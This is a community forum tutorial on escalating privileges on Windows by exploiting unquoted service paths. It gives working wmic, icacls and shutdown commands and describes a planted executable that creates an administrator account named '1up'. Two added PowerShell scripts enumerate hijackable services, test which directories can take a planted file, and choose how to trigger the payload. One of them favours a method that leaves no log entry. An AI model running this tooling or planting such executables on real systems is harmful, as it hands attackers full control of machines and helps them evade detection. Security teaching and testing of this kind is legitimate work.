Windows Privilege Escalation – Unquoted Services

So, you’ve popped a user shell on a Windows box and now you’re looking to escalate those privileges. Great! In this article we’ll look at one method of elevating your privileges by exploiting services whose executable path is not quoted.

A Windows service is a program that runs in the background, similar to a *nix daemon. Often services are started automatically when Windows loads, but they can also be started manually by a user or by other software. When a Windows service is installed, a registry key is created for it under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services along with several values. One of those values, ImagePath (shown in the screenshot), specifies the location of the service executable, optionally followed by command-line arguments.

In the screenshot the file path is not surrounded by quotes, which makes this service a candidate for escalating our privileges. When a service is started, the Service Control Manager hands the ImagePath string to the CreateProcess function as the command line. If the path is quoted, CreateProcess knows exactly where the executable name ends. If it is not quoted and contains spaces, CreateProcess has to guess where the executable name stops and the arguments begin: it tries each space-delimited prefix in turn, appending .exe when there is no extension, and runs the first file that exists. For example, if the ImagePath value contained c:\program files\sub dir\program name then the function would attempt to execute the following, in this order:

c:\program.exe files\sub dir\program name
c:\program files\sub.exe dir\program name
c:\program files\sub dir\program.exe name
c:\program files\sub dir\program name.exe

If we can write to any of the directories along that path, we can drop an executable under one of the earlier candidate names and the Service Control Manager will run it under the service’s account, which for most services is LocalSystem, and our privileges are escalated. Now that we know how to take advantage of unquoted service paths, let’s look at how to find them. You could simply look through the registry checking each service, but that would take some time. An easier method is to query WMI for all services and then filter the results. The following command lists all services:

C:\>wmic service get name,pathname,startmode

While this method lists every service’s name, path to executable and start mode, we can go a few steps further and prune the list down to just those services whose path is unquoted. Let’s pipe the output through findstr to filter our results:

C:\>wmic service get name,pathname,startmode |findstr /i /v "C:\Windows\\" |findstr /i /v """
Name                                 PathName                                                                                   StartMode
VulnService                          C:\Program Files (x86)\Vuln Service\Vuln Service Bin\VulnService.exe                       Auto

We pipe the results from wmic into findstr, using the /i option so the search is not case sensitive and the /v option to print only the lines that do not contain a match. The first findstr drops every service living under C:\Windows\ and the second drops any line containing a quote character (""" is how a literal double quote is passed on the cmd.exe command line), leaving only the unquoted services. Note that wmic is deprecated and is no longer installed by default on recent Windows 11 builds; the same data is available from PowerShell via Get-CimInstance Win32_Service. Lucky for us we found a service named VulnService whose path is not quoted and whose StartMode is Auto. This means that, if we have the appropriate permissions, we can place a malicious executable at any of the following locations and it will be executed with the service’s privileges the next time the service is started. CreateProcess tries them in this order and stops at the first one that exists, so an earlier candidate beats the real binary:

C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Vuln.exe
C:\Program Files (x86)\Vuln Service\Vuln.exe
C:\Program Files (x86)\Vuln Service\Vuln Service.exe
C:\Program Files (x86)\Vuln Service\Vuln Service Bin\VulnService.exe

To check permissions on a directory we can use the icacls tool. In its output (F) is full control, (M) modify, (W) write, (RX) read and execute, (WD) write data/add file and (AD) append data/add subdirectory; (OI), (CI) and (IO) are inheritance flags (object inherit, container inherit, inherit only) and (I) marks an ACE that was itself inherited from the parent. We are looking for an ACE that gives our user, or a group we belong to such as BUILTIN\Users or Authenticated Users, the right to add files in one of the candidate directories. Let’s check each directory:

C:\>icacls "c:"
c: BUILTIN\Administrators:(F)
   BUILTIN\Administrators:(OI)(CI)(IO)(F)
   NT AUTHORITY\SYSTEM:(F)
   NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
   BUILTIN\Users:(OI)(CI)(RX)
   NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(M)
   NT AUTHORITY\Authenticated Users:(AD)
   Mandatory Label\High Mandatory Level:(OI)(NP)(IO)(NW)

C:\>icacls "C:\Program Files (x86)"
C:\Program Files (x86) NT SERVICE\TrustedInstaller:(F)
                       NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                       NT AUTHORITY\SYSTEM:(M)
                       NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                       BUILTIN\Administrators:(M)
                       BUILTIN\Administrators:(OI)(CI)(IO)(F)
                       BUILTIN\Users:(RX)
                       BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
                       CREATOR OWNER:(OI)(CI)(IO)(F)

C:\>icacls "C:\Program Files (x86)\Vuln Service"
C:\Program Files (x86)\Vuln Service BUILTIN\Users:(OI)(CI)(F)
                                    NT SERVICE\TrustedInstaller:(I)(F)
                                    NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                    NT AUTHORITY\SYSTEM:(I)(F)
                                    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                    BUILTIN\Administrators:(I)(F)
                                    BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                    BUILTIN\Users:(I)(RX)
                                    BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                    CREATOR OWNER:(I)(OI)(CI)(IO)(F)

C:\>icacls "C:\Program Files (x86)\Vuln Service\Vuln Service Bin"
C:\Program Files (x86)\Vuln Service\Vuln Service Bin BUILTIN\Users:(OI)(CI)(F)
                                                     NT SERVICE\TrustedInstaller:(I)(F)
                                                     NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                                     BUILTIN\Administrators:(I)(F)
                                                     BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                                     BUILTIN\Users:(I)(RX)
                                                     BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Sweet! We found two directories, C:\Program Files (x86)\Vuln Service\ and C:\Program Files (x86)\Vuln Service\Vuln Service Bin\, that grant BUILTIN\Users full control (F); the ACE is not marked (I), so the installer added it explicitly rather than inheriting it. The other candidates are out of reach: on C:\ Authenticated Users only have (AD), which allows creating subdirectories but not files, so C:\Program.exe and C:\Program Files.exe cannot be created, and C:\Program Files (x86) gives Users (RX) only. This means we can place a malicious executable at any of the following locations to exploit the unquoted service. Since CreateProcess stops at the first candidate that exists, the first of these is all we need, and we never have to touch the real VulnService.exe:

C:\Program Files (x86)\Vuln Service\Vuln.exe
C:\Program Files (x86)\Vuln Service\Vuln Service.exe
C:\Program Files (x86)\Vuln Service\Vuln Service Bin\VulnService.exe
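The whole procedure above (find the unquoted paths, expand the candidate names CreateProcess will try in order, then check which of those directories we can actually write to) can be scripted so it does not depend on reading icacls output by eye. The following PowerShell is an added example and not the article’s own code. The service name VulnService and the candidate paths it finds are the ones from the article; the only change it makes to the box is creating and immediately deleting a zero-byte probe file in each candidate directory.

```powershell
# Added example (not from the original article). Enumerate services whose
# ImagePath is unquoted and contains a space, expand the candidate paths that
# CreateProcess will try in order, and test whether the current user can
# create a file in each candidate's directory. Run from the low-privilege shell.

function Get-ExecutablePart {
    # ImagePath may carry arguments ("C:\Program Files\Foo\svc.exe -k x").
    # Keep everything up to and including the first ".exe"; if there is no
    # ".exe" at all, treat the whole string as the path.
    param([string]$PathName)
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { $m.Groups[1].Value } else { $PathName }
}

function Get-UnquotedServicePath {
    # Win32_Service.PathName is the ImagePath; StartName is the account the
    # service runs as (LocalSystem for most of the interesting ones).
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and
                       $_.PathName -notmatch '^[a-z]:\\windows\\' } |
        ForEach-Object {
            $exe = Get-ExecutablePart $_.PathName
            if ($exe -match ' ') {          # a space only in the arguments is harmless
                [pscustomobject]@{
                    Name = $_.Name; StartMode = $_.StartMode
                    RunsAs = $_.StartName; ExePath = $exe
                }
            }
        }
}

function Get-HijackCandidate {
    # CreateProcess tries each space-delimited prefix, appending .exe, and runs
    # the first file that exists. Emit the candidates in exactly that order;
    # the full path (the legitimate binary) comes last.
    param([string]$ExePath)
    $parts = $ExePath -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
    $ExePath
}

function Test-CanCreateFile {
    # The honest test for "can I drop an exe here": try to create (and remove)
    # a zero-byte file. This catches cases icacls output hides from the eye,
    # such as C:\ where Authenticated Users have (AD): folders yes, files no.
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Find-HijackableService {
    foreach ($svc in Get-UnquotedServicePath) {
        foreach ($cand in Get-HijackCandidate $svc.ExePath) {
            $dir = [System.IO.Path]::GetDirectoryName($cand)
            [pscustomobject]@{
                Service     = $svc.Name
                StartMode   = $svc.StartMode
                RunsAs      = $svc.RunsAs
                Candidate   = $cand
                Exists      = Test-Path -LiteralPath $cand
                DirWritable = Test-CanCreateFile $dir
            }
        }
    }
}

# Show only the candidates we could actually plant. For the article's
# VulnService this leaves the three paths under "Vuln Service\"; C:\Program.exe,
# C:\Program Files.exe and "Program Files (x86)\Vuln.exe" drop out because
# a standard user cannot add files to those directories.
Find-HijackableService | Where-Object { $_.DirWritable } | Format-Table -AutoSize
```

The RunsAs column is the check the article skips: a service whose StartName is a low-privilege virtual or domain account gives you that account, not SYSTEM. The Exists column tells you whether a candidate is free (plant a new file) or is the legitimate binary (you would have to overwrite it, which the directory ACL alone does not guarantee).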

Now all we need is a malicious executable to elevate our permissions. There are many ways to go about this; I’m choosing to write a C# program that creates a new local administrator account named 1up with the password secret. Because the service runs as LocalSystem, the program has all the rights it needs to create the account and add it to the Administrators group. Let’s get started writing our C# code.

View C# Source Code Here

Now compile the code using Visual Studio Community and place the executable at one of the target locations we discovered with write permissions, named exactly as CreateProcess will look for it (for example C:\Program Files (x86)\Vuln Service\Vuln.exe). Because our program is not a real service it never calls StartServiceCtrlDispatcher, so the Service Control Manager will report error 1053 (the service did not respond to the start request in a timely fashion) after about 30 seconds and terminate the process; do the work at the very start of main so it finishes before that happens. Once your malicious executable is in place the final task is to restart the service to execute our exe. You’ll likely find you don’t have permission to stop or start it (sc sdshow VulnService shows the service’s own ACL). Since the service is set to Auto we can simply wait until the system reboots, or, if our account holds SeShutdownPrivilege (standard users do on workstations, but by default not on servers), reboot the system ourselves with:

shutdown /r /t 0

If all goes well when Windows reboots it will start our malicious executable creating a new administrator user that we can use to elevate our permissions which completes our hack.
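The two questions the last step raises, whether we are allowed to restart the service and whether we may reboot instead, can be answered before planting anything. The following PowerShell is an added example, not code from the article: it reads the service’s security descriptor with sc.exe sdshow, checks for the SERVICE_START (RP) and SERVICE_STOP (WP) rights, and looks for SeShutdownPrivilege in our token. VulnService is the article’s service name; the list of SDDL SID abbreviations it matches against is a simplification, as noted in the comments.

```powershell
# Added example (not from the original article). Decide how the payload will
# get executed: can we restart the service ourselves, can we reboot, or do we
# have to wait for the next boot?

function Get-ServiceSddl {
    # sc.exe sdshow prints the service object's security descriptor as SDDL.
    param([string]$Name)
    $out = (& sc.exe sdshow $Name) -join ''
    if ($LASTEXITCODE -ne 0) { throw "sc sdshow $Name failed: $out" }
    $out.Trim()
}

function Test-CanStartStopService {
    # An SDDL ACE looks like (A;;CCLCSWRPWPDTLOCRRC;;;AU): type;flags;rights;
    # objguid;inhguid;sid. Service rights are two-letter tokens: RP is
    # SERVICE_START, WP is SERVICE_STOP, GA is generic all. Return $true if an
    # allow ACE for one of $Sids grants both start and stop. Deny ACEs and
    # numeric (0x...) rights masks are deliberately not handled here.
    param([string]$Sddl, [string[]]$Sids)
    $aceRe = '\(([AD]);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)'
    foreach ($m in [regex]::Matches($Sddl, $aceRe)) {
        if ($m.Groups[1].Value -ne 'A') { continue }
        if ($Sids -notcontains $m.Groups[6].Value) { continue }
        $rights = $m.Groups[3].Value
        if ($rights.StartsWith('0x')) { continue }
        $tokens = for ($i = 0; $i + 1 -lt $rights.Length; $i += 2) { $rights.Substring($i, 2) }
        if ($tokens -contains 'GA') { return $true }
        if ($tokens -contains 'RP' -and $tokens -contains 'WP') { return $true }
    }
    return $false
}

function Test-HasShutdownPrivilege {
    # whoami /priv lists every privilege in the token, enabled or disabled;
    # shutdown.exe enables SeShutdownPrivilege itself, so presence is enough.
    [bool]((& whoami.exe /priv) -match 'SeShutdownPrivilege')
}

function Get-MySddlSids {
    # SDDL abbreviates well-known SIDs (WD Everyone, AU Authenticated Users,
    # BU Users, IU Interactive); everything else appears as a full S-1-... SID.
    # Assumption: an interactive, authenticated local user matches all four.
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    @('WD', 'AU', 'BU', 'IU', $id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
}

function Get-TriggerPlan {
    param([string]$ServiceName)
    if (Test-CanStartStopService (Get-ServiceSddl $ServiceName) (Get-MySddlSids)) {
        "Restart-Service '$ServiceName' will run the payload right away."
    } elseif (Test-HasShutdownPrivilege) {
        "Cannot restart $ServiceName; SeShutdownPrivilege is present, so use: shutdown /r /t 0"
    } else {
        "Cannot restart $ServiceName or reboot; with StartMode Auto, wait for the next boot."
    }
}

Get-TriggerPlan -ServiceName 'VulnService'
```

Checking the SDDL rather than just trying Restart-Service keeps the reconnaissance quiet: a failed stop attempt against a service you cannot control is logged, while sc sdshow only needs READ_CONTROL, which services grant to everyone by default.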

Check out the YouTube video

Happy Hacking!
This topic contains 0 replies, has 1 voice, and was last updated by HackHappy 1 month ago.

The forum ‘Community Articles’ is closed to new topics and replies.


Copyright ©2018 Caendra, Inc.
